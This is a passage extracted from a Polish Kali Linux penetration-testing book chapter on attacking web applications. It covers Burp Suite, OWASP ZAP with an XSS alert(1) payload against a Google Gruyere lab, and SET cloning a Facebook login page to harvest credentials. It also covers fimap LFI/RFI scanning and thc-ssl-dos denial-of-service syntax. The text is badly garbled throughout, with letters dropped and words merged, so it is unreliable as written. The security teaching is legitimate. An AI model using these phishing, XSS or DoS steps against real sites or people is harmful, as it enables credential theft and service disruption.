Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
